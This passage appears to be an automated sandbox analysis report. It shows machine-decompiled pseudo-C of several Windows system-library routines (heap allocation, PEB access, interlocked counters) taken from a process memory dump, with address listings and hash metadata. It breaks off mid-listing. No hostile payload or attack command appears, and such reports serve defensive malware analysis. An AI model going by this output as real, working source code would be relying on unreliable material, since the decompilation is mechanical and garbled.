                                                              								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                              								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                              							}
                                                              							return 0;
                                                              						}
                                                              					}
                                                              					_t61 = _a4;
                                                              					if(_t61 != 0) {
                                                              						L3:
                                                              						_t43 = L04BB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                              						_t61[2] = _t43;
                                                              						if(_t43 == 0) {
                                                              							return 0xc0000017;
                                                              						}
                                                              						_t61[1] = _t60;
                                                              						 *_t61 = 0;
                                                              						goto L5;
                                                              					}
                                                              					goto L22;
                                                              				}
                                                              				_t61 = _a4;
                                                              				if(_t61 == 0) {
                                                              					return 0xc000000d;
                                                              				}
                                                              				goto L3;
                                                              			}
















                                                              0x04bd3d4c
                                                              0x04bd3d50
                                                              0x04bd3d55
                                                              0x04bd3d5e
                                                              0x04c0e79a
                                                              0x00000000
                                                              0x04c0e79a
                                                              0x04bd3d68
                                                              0x04c0e789
                                                              0x04bd3d9d
                                                              0x04bd3da3
                                                              0x04bd3daf
                                                              0x04bd3db5
                                                              0x04bd3dbc
                                                              0x04bd3dc4
                                                              0x04bd3dc9
                                                              0x04bd3dce
                                                              0x04c0e7ae
                                                              0x04c0e7ae
                                                              0x04bd3dde
                                                              0x04bd3de2
                                                              0x04bd3de7
                                                              0x04bd3e0d
                                                              0x04bd3e13
                                                              0x04bd3e16
                                                              0x04bd3e1e
                                                              0x04bd3e25
                                                              0x04bd3e28
                                                              0x00000000
                                                              0x00000000
                                                              0x04bd3e2a
                                                              0x04bd3e2f
                                                              0x04bd3e37
                                                              0x04bd3e37
                                                              0x00000000
                                                              0x04bd3e37
                                                              0x04bd3e31
                                                              0x00000000
                                                              0x04bd3e31
                                                              0x04bd3e20
                                                              0x04bd3e20
                                                              0x04bd3e35
                                                              0x00000000
                                                              0x04bd3de9
                                                              0x04bd3de9
                                                              0x04bd3de9
                                                              0x04bd3dee
                                                              0x04bd3dfd
                                                              0x04bd3dff
                                                              0x04bd3e02
                                                              0x04bd3e05
                                                              0x04bd3e05
                                                              0x00000000
                                                              0x04bd3df0
                                                              0x04bd3de7
                                                              0x04c0e78f
                                                              0x04c0e794
                                                              0x04bd3d79
                                                              0x04bd3d84
                                                              0x04bd3d89
                                                              0x04bd3d8e
                                                              0x00000000
                                                              0x04c0e7a4
                                                              0x04bd3d96
                                                              0x04bd3d9a
                                                              0x00000000
                                                              0x04bd3d9a
                                                              0x00000000
                                                              0x04c0e794
                                                              0x04bd3d6e
                                                              0x04bd3d73
                                                              0x00000000
                                                              0x04c0e7b5
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 018563fafee647ab7a64efe8b543b79aac3c3205f0e00a27f393335796a50551
                                                              • Instruction ID: 5a7ede72d4fe2bef7e233d5df192ac4aca06eb076824280ff2be1c152c3a2d63
                                                              • Opcode Fuzzy Hash: 018563fafee647ab7a64efe8b543b79aac3c3205f0e00a27f393335796a50551
                                                              • Instruction Fuzzy Hash: 9731B031705615DBC7248F2DC841A7ABBE5EF95700B0584EAE846CB391F730E840EBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E04C17016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                              				signed int _v8;
                                                              				char _v588;
                                                              				intOrPtr _v592;
                                                              				intOrPtr _v596;
                                                              				signed short* _v600;
                                                              				char _v604;
                                                              				short _v606;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed short* _t55;
                                                              				void* _t56;
                                                              				signed short* _t58;
                                                              				signed char* _t61;
                                                              				char* _t68;
                                                              				void* _t69;
                                                              				void* _t71;
                                                              				void* _t72;
                                                              				signed int _t75;
                                                              
                                                              				_t64 = __edx;
                                                              				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                              				_v8 =  *0x4c8d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                              				_t55 = _a16;
                                                              				_v606 = __ecx;
                                                              				_t71 = 0;
                                                              				_t58 = _a12;
                                                              				_v596 = __edx;
                                                              				_v600 = _t58;
                                                              				_t68 =  &_v588;
                                                              				if(_t58 != 0) {
                                                              					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                              					if(_t55 != 0) {
                                                              						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                              					}
                                                              				}
                                                              				_t8 = _t71 + 0x2a; // 0x28
                                                              				_t33 = _t8;
                                                              				_v592 = _t8;
                                                              				if(_t71 <= 0x214) {
                                                              					L6:
                                                              					 *((short*)(_t68 + 6)) = _v606;
                                                              					if(_t64 != 0xffffffff) {
                                                              						asm("cdq");
                                                              						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                              						 *((char*)(_t68 + 0x28)) = _a4;
                                                              						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                              						 *((char*)(_t68 + 0x29)) = _a8;
                                                              						if(_t71 != 0) {
                                                              							_t22 = _t68 + 0x2a; // 0x2a
                                                              							_t64 = _t22;
                                                              							E04C16B4C(_t58, _t22, _t71,  &_v604);
                                                              							if(_t55 != 0) {
                                                              								_t25 = _v604 + 0x2a; // 0x2a
                                                              								_t64 = _t25 + _t68;
                                                              								E04C16B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                              							}
                                                              							if(E04BB7D50() == 0) {
                                                              								_t61 = 0x7ffe0384;
                                                              							} else {
                                                              								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              							}
                                                              							_push(_t68);
                                                              							_push(_v592 + 0xffffffe0);
                                                              							_push(0x402);
                                                              							_push( *_t61 & 0x000000ff);
                                                              							E04BD9AE0();
                                                              						}
                                                              					}
                                                              					_t35 =  &_v588;
                                                              					if( &_v588 != _t68) {
                                                              						_t35 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                              					}
                                                              					L16:
                                                              					_pop(_t69);
                                                              					_pop(_t72);
                                                              					_pop(_t56);
                                                              					return E04BDB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                              				}
                                                              				_t68 = L04BB4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                              				if(_t68 == 0) {
                                                              					goto L16;
                                                              				} else {
                                                              					_t58 = _v600;
                                                              					_t64 = _v596;
                                                              					goto L6;
                                                              				}
                                                              			}






















                                                              0x04c17016
                                                              0x04c1701e
                                                              0x04c1702b
                                                              0x04c17033
                                                              0x04c17037
                                                              0x04c1703c
                                                              0x04c1703e
                                                              0x04c17041
                                                              0x04c17045
                                                              0x04c1704a
                                                              0x04c17050
                                                              0x04c17055
                                                              0x04c1705a
                                                              0x04c17062
                                                              0x04c17062
                                                              0x04c1705a
                                                              0x04c17064
                                                              0x04c17064
                                                              0x04c17067
                                                              0x04c17071
                                                              0x04c17096
                                                              0x04c1709b
                                                              0x04c170a2
                                                              0x04c170a6
                                                              0x04c170a7
                                                              0x04c170ad
                                                              0x04c170b3
                                                              0x04c170b6
                                                              0x04c170bb
                                                              0x04c170c3
                                                              0x04c170c3
                                                              0x04c170c6
                                                              0x04c170cd
                                                              0x04c170dd
                                                              0x04c170e0
                                                              0x04c170e2
                                                              0x04c170e2
                                                              0x04c170ee
                                                              0x04c17101
                                                              0x04c170f0
                                                              0x04c170f9
                                                              0x04c170f9
                                                              0x04c1710a
                                                              0x04c1710e
                                                              0x04c17112
                                                              0x04c17117
                                                              0x04c17118
                                                              0x04c17118
                                                              0x04c170bb
                                                              0x04c1711d
                                                              0x04c17123
                                                              0x04c17131
                                                              0x04c17131
                                                              0x04c17136
                                                              0x04c1713d
                                                              0x04c1713e
                                                              0x04c1713f
                                                              0x04c1714a
                                                              0x04c1714a
                                                              0x04c17084
                                                              0x04c17088
                                                              0x00000000
                                                              0x04c1708e
                                                              0x04c1708e
                                                              0x04c17092
                                                              0x00000000
                                                              0x04c17092

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75415f4780f90bfd36e64b1bb48e370d9efb4188fa1687af36c838151f8cd0ec
                                                              • Instruction ID: 5161c923eda1b74d616cfd23595f7d5567549c40c73090f84c18f55d8e23d58e
                                                              • Opcode Fuzzy Hash: 75415f4780f90bfd36e64b1bb48e370d9efb4188fa1687af36c838151f8cd0ec
                                                              • Instruction Fuzzy Hash: 4131C4766057519BC320DF68CC40A6AB3E6FFC9700F144A6DF899876A0E730F904D7A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 68%
                                                              			E04BBC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                              				signed int* _v8;
                                                              				char _v16;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed char _t33;
                                                              				signed char _t43;
                                                              				signed char _t48;
                                                              				signed char _t62;
                                                              				void* _t63;
                                                              				intOrPtr _t69;
                                                              				intOrPtr _t71;
                                                              				unsigned int* _t82;
                                                              				void* _t83;
                                                              
                                                              				_t80 = __ecx;
                                                              				_t82 = __edx;
                                                              				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                              				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                              				if((_t33 & 0x00000001) != 0) {
                                                              					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                              					if(E04BB7D50() != 0) {
                                                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              					} else {
                                                              						_t43 = 0x7ffe0386;
                                                              					}
                                                              					if( *_t43 != 0) {
                                                              						_t43 = E04C68D34(_v8, _t80);
                                                              					}
                                                              					E04BB2280(_t43, _t82);
                                                              					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                              						E04BAFFB0(_t62, _t80, _t82);
                                                              						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                              						_t30 = _t80 + 0xd0; // 0xd0
                                                              						_t83 = _t30;
                                                              						E04C68833(_t83,  &_v16);
                                                              						_t81 = _t80 + 0x90;
                                                              						E04BAFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                              						_t63 = 0;
                                                              						_push(0);
                                                              						_push(_t83);
                                                              						_t48 = E04BDB180();
                                                              						if(_a4 != 0) {
                                                              							E04BB2280(_t48, _t81);
                                                              						}
                                                              					} else {
                                                              						_t69 = _v8;
                                                              						_t12 = _t80 + 0x98; // 0x98
                                                              						_t13 = _t69 + 0xc; // 0x575651ff
                                                              						E04BBBB2D(_t13, _t12);
                                                              						_t71 = _v8;
                                                              						_t15 = _t80 + 0xb0; // 0xb0
                                                              						_t16 = _t71 + 8; // 0x8b000cc2
                                                              						E04BBBB2D(_t16, _t15);
                                                              						E04BBB944(_v8, _t62);
                                                              						 *((char*)(_t80 + 0xdc)) = 0;
                                                              						E04BAFFB0(0, _t80, _t82);
                                                              						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                              						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                              						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                              						 *(_t80 + 0xde) = 0;
                                                              						if(_a4 == 0) {
                                                              							_t25 = _t80 + 0x90; // 0x90
                                                              							E04BAFFB0(0, _t80, _t25);
                                                              						}
                                                              						_t63 = 1;
                                                              					}
                                                              					return _t63;
                                                              				}
                                                              				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                              				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                              				if(_a4 == 0) {
                                                              					_t24 = _t80 + 0x90; // 0x90
                                                              					E04BAFFB0(0, __ecx, _t24);
                                                              				}
                                                              				return 0;
                                                              			}
















                                                              0x04bbc18d
                                                              0x04bbc18f
                                                              0x04bbc191
                                                              0x04bbc19b
                                                              0x04bbc1a0
                                                              0x04bbc1d4
                                                              0x04bbc1de
                                                              0x04c02d6e
                                                              0x04bbc1e4
                                                              0x04bbc1e4
                                                              0x04bbc1e4
                                                              0x04bbc1ec
                                                              0x04c02d7d
                                                              0x04c02d7d
                                                              0x04bbc1f3
                                                              0x04bbc1ff
                                                              0x04c02d88
                                                              0x04c02d8d
                                                              0x04c02d94
                                                              0x04c02d94
                                                              0x04c02d9f
                                                              0x04c02da4
                                                              0x04c02dab
                                                              0x04c02db0
                                                              0x04c02db2
                                                              0x04c02db3
                                                              0x04c02db4
                                                              0x04c02dbc
                                                              0x04c02dc3
                                                              0x04c02dc3
                                                              0x04bbc205
                                                              0x04bbc205
                                                              0x04bbc208
                                                              0x04bbc20e
                                                              0x04bbc211
                                                              0x04bbc216
                                                              0x04bbc219
                                                              0x04bbc21f
                                                              0x04bbc222
                                                              0x04bbc22c
                                                              0x04bbc234
                                                              0x04bbc23a
                                                              0x04bbc23f
                                                              0x04bbc245
                                                              0x04bbc24b
                                                              0x04bbc251
                                                              0x04bbc25a
                                                              0x04bbc276
                                                              0x04bbc27d
                                                              0x04bbc27d
                                                              0x04bbc25c
                                                              0x04bbc25c
                                                              0x00000000
                                                              0x04bbc25e
                                                              0x04bbc1a4
                                                              0x04bbc1aa
                                                              0x04bbc1b3
                                                              0x04bbc265
                                                              0x04bbc26c
                                                              0x04bbc26c
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                              • Instruction ID: bba83cd9c4b18c2c1040851bdba47e6a14c11467930ca17d38edc9307227ca3f
                                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                              • Instruction Fuzzy Hash: DD311471705646AEEB08EBB4C480BF9FB64BF42248F0481DEC55897341DBB57A19DBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E04BD8EC7(void* __ecx, void* __edx) {
                                                              				signed int _v8;
                                                              				signed int* _v16;
                                                              				intOrPtr _v20;
                                                              				signed int* _v24;
                                                              				char* _v28;
                                                              				signed int* _v32;
                                                              				intOrPtr _v36;
                                                              				signed int* _v40;
                                                              				signed int* _v44;
                                                              				signed int* _v48;
                                                              				intOrPtr _v52;
                                                              				signed int* _v56;
                                                              				signed int* _v60;
                                                              				signed int* _v64;
                                                              				intOrPtr _v68;
                                                              				signed int* _v72;
                                                              				char* _v76;
                                                              				signed int* _v80;
                                                              				signed int _v84;
                                                              				signed int* _v88;
                                                              				intOrPtr _v92;
                                                              				signed int* _v96;
                                                              				intOrPtr _v100;
                                                              				signed int* _v104;
                                                              				signed int* _v108;
                                                              				char _v140;
                                                              				signed int _v144;
                                                              				signed int _v148;
                                                              				signed int* _v152;
                                                              				char _v156;
                                                              				signed int* _v160;
                                                              				char _v164;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t67;
                                                              				intOrPtr _t70;
                                                              				void* _t71;
                                                              				void* _t72;
                                                              				signed int _t73;
                                                              
                                                              				_t69 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t73;
                                                              				_t48 =  *[fs:0x30];
                                                              				_t72 = __edx;
                                                              				_t71 = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                              					_t48 = E04BC4E70(0x4c886e4, 0x4bd9490, 0, 0);
                                                              					if( *0x4c853e8 > 5 && E04BD8F33(0x4c853e8, 0, 0x2000) != 0) {
                                                              						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                              						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                              						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                              						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                              						_v108 =  &_v84;
                                                              						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                              						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                              						_v76 =  &_v156;
                                                              						_t70 = 8;
                                                              						_v60 =  &_v144;
                                                              						_t67 = 4;
                                                              						_v44 =  &_v148;
                                                              						_v152 = 0;
                                                              						_v160 = 0;
                                                              						_v104 = 0;
                                                              						_v100 = 2;
                                                              						_v96 = 0;
                                                              						_v88 = 0;
                                                              						_v80 = 0;
                                                              						_v72 = 0;
                                                              						_v68 = _t70;
                                                              						_v64 = 0;
                                                              						_v56 = 0;
                                                              						_v52 = 0x4c853e8;
                                                              						_v48 = 0;
                                                              						_v40 = 0;
                                                              						_v36 = 0x4c853e8;
                                                              						_v32 = 0;
                                                              						_v28 =  &_v164;
                                                              						_v24 = 0;
                                                              						_v20 = _t70;
                                                              						_v16 = 0;
                                                              						_t69 = 0x4b7bc46;
                                                              						_t48 = E04C17B9C(0x4c853e8, 0x4b7bc46, _t67, 0x4c853e8, _t70,  &_v140);
                                                              					}
                                                              				}
                                                              				return E04BDB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                              			}











































                                                              0x04bd8ec7
                                                              0x04bd8ed9
                                                              0x04bd8edc
                                                              0x04bd8ee6
                                                              0x04bd8ee9
                                                              0x04bd8eee
                                                              0x04bd8efc
                                                              0x04bd8f08
                                                              0x04c11349
                                                              0x04c11353
                                                              0x04c1135d
                                                              0x04c11366
                                                              0x04c1136f
                                                              0x04c11375
                                                              0x04c1137c
                                                              0x04c11385
                                                              0x04c11390
                                                              0x04c11391
                                                              0x04c1139c
                                                              0x04c1139d
                                                              0x04c113a6
                                                              0x04c113ac
                                                              0x04c113b2
                                                              0x04c113b5
                                                              0x04c113bc
                                                              0x04c113bf
                                                              0x04c113c2
                                                              0x04c113c5
                                                              0x04c113c8
                                                              0x04c113cb
                                                              0x04c113ce
                                                              0x04c113d1
                                                              0x04c113d4
                                                              0x04c113d7
                                                              0x04c113da
                                                              0x04c113dd
                                                              0x04c113e0
                                                              0x04c113e3
                                                              0x04c113e6
                                                              0x04c113e9
                                                              0x04c113f6
                                                              0x04c11400
                                                              0x04c11400
                                                              0x04bd8f08
                                                              0x04bd8f32

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2727ec0937c1bd031833e2a6b0fb70c879bc07b08fddc29a24e0ccb5dee1b6df
                                                              • Instruction ID: 6e6b3a352b14a7ff053afd36b82cb450bc0ecdf1b736138646a1498f8adb5c48
                                                              • Opcode Fuzzy Hash: 2727ec0937c1bd031833e2a6b0fb70c879bc07b08fddc29a24e0ccb5dee1b6df
                                                              • Instruction Fuzzy Hash: 0A41B2B1D003189FDB24DFAAD980AADFBF5FB48314F9041AEE519A7600E7746A44CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 74%
                                                              			E04BCE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                              				intOrPtr* _v0;
                                                              				signed char _v4;
                                                              				signed int _v8;
                                                              				void* __ecx;
                                                              				void* __ebp;
                                                              				void* _t37;
                                                              				intOrPtr _t38;
                                                              				signed int _t44;
                                                              				signed char _t52;
                                                              				void* _t54;
                                                              				intOrPtr* _t56;
                                                              				void* _t58;
                                                              				char* _t59;
                                                              				signed int _t62;
                                                              
                                                              				_t58 = __edx;
                                                              				_push(0);
                                                              				_push(4);
                                                              				_push( &_v8);
                                                              				_push(0x24);
                                                              				_push(0xffffffff);
                                                              				if(E04BD9670() < 0) {
                                                              					L04BEDF30(_t54, _t58, _t35);
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					_push(_t54);
                                                              					_t52 = _v4;
                                                              					if(_t52 > 8) {
                                                              						_t37 = 0xc0000078;
                                                              					} else {
                                                              						_t38 =  *0x4c87b9c; // 0x0
                                                              						_t62 = _t52 & 0x000000ff;
                                                              						_t59 = L04BB4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                              						if(_t59 == 0) {
                                                              							_t37 = 0xc0000017;
                                                              						} else {
                                                              							_t56 = _v0;
                                                              							 *(_t59 + 1) = _t52;
                                                              							 *_t59 = 1;
                                                              							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                              							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                              							_t44 = _t62 - 1;
                                                              							if(_t44 <= 7) {
                                                              								switch( *((intOrPtr*)(_t44 * 4 +  &M04BCE810))) {
                                                              									case 0:
                                                              										L6:
                                                              										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                              										goto L7;
                                                              									case 1:
                                                              										L13:
                                                              										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                              										goto L6;
                                                              									case 2:
                                                              										L12:
                                                              										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                              										goto L13;
                                                              									case 3:
                                                              										L11:
                                                              										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                              										goto L12;
                                                              									case 4:
                                                              										L10:
                                                              										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                              										goto L11;
                                                              									case 5:
                                                              										L9:
                                                              										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                              										goto L10;
                                                              									case 6:
                                                              										L17:
                                                              										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                              										goto L9;
                                                              									case 7:
                                                              										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                              										goto L17;
                                                              								}
                                                              							}
                                                              							L7:
                                                              							 *_a40 = _t59;
                                                              							_t37 = 0;
                                                              						}
                                                              					}
                                                              					return _t37;
                                                              				} else {
                                                              					_push(0x20);
                                                              					asm("ror eax, cl");
                                                              					return _a4 ^ _v8;
                                                              				}
                                                              			}

















                                                              0x04bce730
                                                              0x04bce736
                                                              0x04bce738
                                                              0x04bce73d
                                                              0x04bce73e
                                                              0x04bce740
                                                              0x04bce749
                                                              0x04bce765
                                                              0x04bce76a
                                                              0x04bce76b
                                                              0x04bce76c
                                                              0x04bce76d
                                                              0x04bce76e
                                                              0x04bce76f
                                                              0x04bce775
                                                              0x04bce777
                                                              0x04bce77e
                                                              0x04c0b675
                                                              0x04bce784
                                                              0x04bce784
                                                              0x04bce789
                                                              0x04bce7a8
                                                              0x04bce7ac
                                                              0x04bce807
                                                              0x04bce7ae
                                                              0x04bce7ae
                                                              0x04bce7b1
                                                              0x04bce7b4
                                                              0x04bce7b9
                                                              0x04bce7c0
                                                              0x04bce7c4
                                                              0x04bce7ca
                                                              0x04bce7cc
                                                              0x00000000
                                                              0x04bce7d3
                                                              0x04bce7d6
                                                              0x00000000
                                                              0x00000000
                                                              0x04bce7ff
                                                              0x04bce802
                                                              0x00000000
                                                              0x00000000
                                                              0x04bce7f9
                                                              0x04bce7fc
                                                              0x00000000
                                                              0x00000000
                                                              0x04bce7f3
                                                              0x04bce7f6
                                                              0x00000000
                                                              0x00000000
                                                              0x04bce7ed
                                                              0x04bce7f0
                                                              0x00000000
                                                              0x00000000
                                                              0x04bce7e7
                                                              0x04bce7ea
                                                              0x00000000
                                                              0x00000000
                                                              0x04c0b685
                                                              0x04c0b688
                                                              0x00000000
                                                              0x00000000
                                                              0x04c0b682
                                                              0x00000000
                                                              0x00000000
                                                              0x04bce7cc
                                                              0x04bce7d9
                                                              0x04bce7dc
                                                              0x04bce7de
                                                              0x04bce7de
                                                              0x04bce7ac
                                                              0x04bce7e4
                                                              0x04bce74b
                                                              0x04bce751
                                                              0x04bce759
                                                              0x04bce761
                                                              0x04bce761

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e09febe479b2a44ff00f6555156af26018157e48f666feea9fece9ade0960fdb
                                                              • Instruction ID: f64bbcaec98067b2f4e86f01f78ef304a9ab1c1117daf288dff4a8c1e32b757e
                                                              • Opcode Fuzzy Hash: e09febe479b2a44ff00f6555156af26018157e48f666feea9fece9ade0960fdb
                                                              • Instruction Fuzzy Hash: C2318D75A54249EFD704CF58D880B9ABBE8FB18314F14829AF904CB341E631FD80CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E04BCBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				intOrPtr _t22;
                                                              				intOrPtr* _t41;
                                                              				intOrPtr _t51;
                                                              
                                                              				_t51 =  *0x4c86100; // 0x33
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				if(_t51 >= 0x800) {
                                                              					L12:
                                                              					return 0;
                                                              				} else {
                                                              					goto L1;
                                                              				}
                                                              				while(1) {
                                                              					L1:
                                                              					_t22 = _t51;
                                                              					asm("lock cmpxchg [ecx], edx");
                                                              					if(_t51 == _t22) {
                                                              						break;
                                                              					}
                                                              					_t51 = _t22;
                                                              					if(_t22 < 0x800) {
                                                              						continue;
                                                              					}
                                                              					goto L12;
                                                              				}
                                                              				E04BB2280(0xd, 0x17e9f1a0);
                                                              				_t41 =  *0x4c860f8; // 0x0
                                                              				if(_t41 != 0) {
                                                              					 *0x4c860f8 =  *_t41;
                                                              					 *0x4c860fc =  *0x4c860fc + 0xffff;
                                                              				}
                                                              				E04BAFFB0(_t41, 0x800, 0x17e9f1a0);
                                                              				if(_t41 != 0) {
                                                              					L6:
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                              					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                              					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                              					do {
                                                              						asm("lock xadd [0x4c860f0], ax");
                                                              						 *((short*)(_t41 + 0x34)) = 1;
                                                              					} while (1 == 0);
                                                              					goto L8;
                                                              				} else {
                                                              					_t41 = L04BB4620(0x4c86100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                              					if(_t41 == 0) {
                                                              						L11:
                                                              						asm("lock dec dword [0x4c86100]");
                                                              						L8:
                                                              						return _t41;
                                                              					}
                                                              					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                              					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                              					if(_t41 == 0) {
                                                              						goto L11;
                                                              					}
                                                              					goto L6;
                                                              				}
                                                              			}










                                                              0x04bcbc36
                                                              0x04bcbc42
                                                              0x04bcbc45
                                                              0x04bcbc4a
                                                              0x04bcbd35
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bcbc50
                                                              0x04bcbc50
                                                              0x04bcbc58
                                                              0x04bcbc5a
                                                              0x04bcbc60
                                                              0x00000000
                                                              0x00000000
                                                              0x04c0a4f2
                                                              0x04c0a4f6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c0a4fc
                                                              0x04bcbc79
                                                              0x04bcbc7e
                                                              0x04bcbc86
                                                              0x04bcbd16
                                                              0x04bcbd20
                                                              0x04bcbd20
                                                              0x04bcbc8d
                                                              0x04bcbc94
                                                              0x04bcbcbd
                                                              0x04bcbcca
                                                              0x04bcbccb
                                                              0x04bcbccc
                                                              0x04bcbccd
                                                              0x04bcbcce
                                                              0x04bcbcd4
                                                              0x04bcbcea
                                                              0x04bcbcee
                                                              0x04bcbcf2
                                                              0x04bcbd00
                                                              0x04bcbd04
                                                              0x00000000
                                                              0x04bcbc96
                                                              0x04bcbcab
                                                              0x04bcbcaf
                                                              0x04bcbd2c
                                                              0x04bcbd2c
